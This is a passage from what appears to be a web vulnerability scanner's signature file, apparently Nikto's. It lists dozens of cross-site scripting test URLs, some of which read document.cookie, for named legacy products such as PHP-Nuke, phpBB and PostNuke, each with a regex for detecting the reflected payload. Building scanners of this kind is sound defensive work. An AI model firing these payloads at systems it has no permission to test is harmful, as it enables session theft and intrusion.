CA-2000-02.\",\"\",\"\"\n\"000778\",\"0\",\"4\",\"/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com\",\"GET\",\"<script>alert\\(document\\.cookie\\)\",\"\",\"\",\"\",\"\",\"Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000779\",\"0\",\"4\",\"/TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"PHP TopSites allows Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000780\",\"41361\",\"4\",\"/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>\",\"GET\",\"<script>javascript:alert\\(document\\.cookie\\)\",\"\",\"\",\"\",\"\",\"MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000781\",\"41361\",\"4\",\"/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)\",\"\",\"\",\"\",\"\",\"MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000782\",\"9238\",\"4\",\"/supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000783\",\"9238\",\"4\",\"/supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000784\",\"9238\",\"4\",\"/supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000785\",\"0\",\"4\",\"/sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.\",\"\",\"\"\n\"000786\",\"20232\",\"4\",\"/submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000787\",\"27097\",\"4\",\"/ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000788\",\"59014\",\"4\",\"/showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"phpLinkat is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000789\",\"0\",\"4\",\"/shop/normal_html.cgi?file=&lt;script&gt;alert(\\\"Vulnerable\\\")&lt;/script&gt;\",\"GET\",\"<script>alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Happymail E-Commerce is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000790\",\"5049\",\"4\",\"/setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000791\",\"0\",\"4\",\"/servlet/custMsg?guestName=<script>alert(\\\"Vulnerable\\\")</script>\",\"POST\",\"<script>alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000792\",\"2689\",\"4\",\"/servlet/CookieExample?cookiename=<script>alert(\\\"Vulnerable\\\")</script>\",\"POST\",\"<script>alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000793\",\"2689\",\"4\",\"/servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Open Market Inc. ContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. CA-2000-02.\",\"\",\"\"\n\"000794\",\"0\",\"4\",\"/search/index.cfm?<script>alert(\\\"Vulnerable\\\")</script>\",\"GET\",\"<script>alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Search agent allows Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000795\",\"0\",\"4\",\"/search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"ezPublish 2.27 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000796\",\"2669\",\"4\",\"/search.php?zoom_query=<script>alert(\\\"hello\\\")</script>\",\"GET\",\"<script>alert\\(\\\"hello\\\"\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Wrensoft Zoom Search Engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000797\",\"2322\",\"4\",\"/search.php?searchstring=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.\",\"\",\"\"\n\"000798\",\"50551\",\"4\",\"/search.php?searchfor=\\\"><script>alert(1776)</script>\",\"GET\",\"<script>alert\\(1776\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000799\",\"0\",\"4\",\"/search.asp?term=<%00script>alert('Vulnerable')</script>\",\"GET\",\"alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error pages (only some browsers will render this). CA-2000-02.\",\"\",\"\"\n\"000800\",\"0\",\"4\",\"/script>alert('Vulnerable')</script>.cfm\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Macromedia's ColdFusion MX server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Patch or upgrade to a newer version, or change the default 404 document. http://www.macromedia.com/v1/handlers/index.cfm?ID=23047\",\"\",\"\"\n\"000801\",\"0\",\"4\",\"/samples/search.dll?query=<script>alert(document.cookie)</script>&logic=AND\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000802\",\"0\",\"4\",\"/replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000803\",\"59443\",\"4\",\"/profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000804\",\"0\",\"4\",\"/postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft+Utilities\\\"%3<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Postnuke Phoenix 0.7.2.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000805\",\"0\",\"4\",\"/postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"PostNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000806\",\"4599\",\"4\",\"/pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000807\",\"0\",\"4\",\"/pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"WoltLab Burning Board is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000808\",\"0\",\"4\",\"/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000809\",\"0\",\"4\",\"/phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000810\",\"0\",\"4\",\"/phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\\\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000811\",\"0\",\"4\",\"/phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000812\",\"0\",\"4\",\"/phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000813\",\"0\",\"4\",\"/phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\\\"Vulnerable\\\")</script>&email1=<script>alert%20(\\\"Vulnerable\\\")</script>\",\"GET\",\"alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"\",\"\",\"\",\"\",\"PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000814\",\"59093\",\"4\",\"/phptonuke.php?filnavn=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"PHP-Nuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000815\",\"37511\",\"4\",\"/phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E\",\"GET\",\"<script>alert\\(Vulnerable\\)<\\/script>\",\"\",\"\",\"\",\"\",\"phpRank is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000816\",\"32774\",\"4\",\"/phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000817\",\"32774\",\"4\",\"/phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000818\",\"27071\",\"4\",\"/phpimageview.php?pic=javascript:alert(8754)\",\"GET\",\"200\",\"alert\\(8754\\)\",\"\",\"The\\sdocument\\shas\\smoved\",\"\",\"PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS).  CA-2000-02.\",\"\",\"\"\n\"000819\",\"0\",\"4\",\"/phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000820\",\"2193\",\"4\",\"/phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"phpBB is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.\",\"\",\"\"\n\"000821\",\"4297\",\"4\",\"/phpBB/viewtopic.php?t=17071&highlight=\\\">\\\"<script>javascript:alert(document.cookie)</script>\",\"GET\",\"<script>javascript:alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"phpBB is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000822\",\"11145\",\"4\",\"/phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000823\",\"11144\",\"4\",\"/phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000824\",\"0\",\"4\",\"/pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Pforum 1.14 is vulnerable to Cross Site Scripting (XSS). CA-2000-02\",\"\",\"\"\n\"000825\",\"0\",\"4\",\"/pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000826\",\"0\",\"4\",\"/Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Vignette server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Upgrade to the latest version.\",\"\",\"\"\n\"000827\",\"2767\",\"4\",\"/openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"OpenAutoClassifieds 1.0 is vulnerable to a XSS attack\",\"\",\"\"\n\"000828\",\"2767\",\"4\",\"/openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt;\",\"GET\",\"<script>alert\\(document\\.domain\\)<\\/script>\",\"\",\"\",\"\",\"\",\"OpenAutoClassifieds 1.x is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000829\",\"0\",\"4\",\"/node/view/666\\\"><script>alert(document.domain)</script>\",\"GET\",\"<script>alert\\(document\\.domain\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000830\",\"5106\",\"4\",\"/netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000831\",\"0\",\"4\",\"/nav/cList.php?root=</script><script>alert('Vulnerable')/<script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)\\/<script>\",\"\",\"\",\"\",\"\",\"RaQ3 server script is vulnerable to Cross Site Scripting (XSS).  CA-2000-02.\",\"\",\"\"\n\"000832\",\"3931\",\"4\",\"/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=\",\"GET\",\"200\",\"\",\"\\[script\\]alert\\('Vulnerable\\)\",\"\",\"\",\"myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000833\",\"3931\",\"4\",\"/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=\",\"GET\",\"200\",\"\",\"<script>alert\\('Vulnerable\\)\",\"\",\"\",\"myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000834\",\"3931\",\"4\",\"/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent\",\"GET\",\"200\",\"\",\"\\[script\\]alert\\(document\\.cookie\\)\",\"\",\"\",\"myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000835\",\"3931\",\"4\",\"/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent\",\"GET\",\"<script>alert\\(document\\.cookie\\)\",\"\",\"\",\"\",\"\",\"myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000836\",\"0\",\"4\",\"/myhome.php?action=messages&box=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000837\",\"0\",\"4\",\"/msadm/user/login.php3?account_name=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000838\",\"0\",\"4\",\"/msadm/site/index.php3?authid=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000839\",\"0\",\"4\",\"/msadm/domain/index.php3?account_name=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000840\",\"50539\",\"4\",\"/modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)\",\"\",\"\",\"\",\"\",\"Basit cms 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000841\",\"0\",\"4\",\"/modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000842\",\"0\",\"4\",\"/modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000843\",\"0\",\"4\",\"/modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000844\",\"0\",\"4\",\"/modules/Forums/bb_smilies.php?bgcolor1=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000845\",\"0\",\"4\",\"/modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000846\",\"0\",\"4\",\"/modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000847\",\"5498\",\"4\",\"/modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000848\",\"0\",\"4\",\"/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000849\",\"0\",\"4\",\"/modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000850\",\"0\",\"4\",\"/modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"This install of PHP-Nuke's modules.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000851\",\"0\",\"4\",\"/modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000852\",\"0\",\"4\",\"/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0\",\"GET\",\"200\",\"javascript:alert\\(9456\\)\",\"\",\"The\\sdocument\\shas\\smoved\",\"\",\"Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000853\",\"20235\",\"4\",\"/modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The DMOZGateway (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000854\",\"5506\",\"4\",\"/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|\",\"GET\",\"<script>alert\\(document\\.cookie\\)\",\"\",\"\",\"\",\"\",\"PostNuke CMS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000855\",\"0\",\"4\",\"/modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000856\",\"0\",\"4\",\"/modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000857\",\"0\",\"4\",\"/modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000858\",\"6226\",\"4\",\"/modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000859\",\"6226\",\"4\",\"/modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000860\",\"5914\",\"4\",\"/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000861\",\"0\",\"4\",\"/modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000862\",\"0\",\"4\",\"/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index\",\"GET\",\"200\",\"javascript:alert\\(document\\.cookie\\);\",\"\",\"\",\"\",\"Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000863\",\"4598\",\"4\",\"/members.asp?SF=%22;}alert(223344);function%20x()\\{v%20=%22\",\"GET\",\"200\",\"alert\\(223344\\)\",\"\",\"The\\sdocument\\shas\\smoved\",\"\",\"Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000864\",\"3201\",\"4\",\"/megabook/admin.cgi?login=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Megabook guestbook is vulnerable to Cross Site Scripting (XSS). 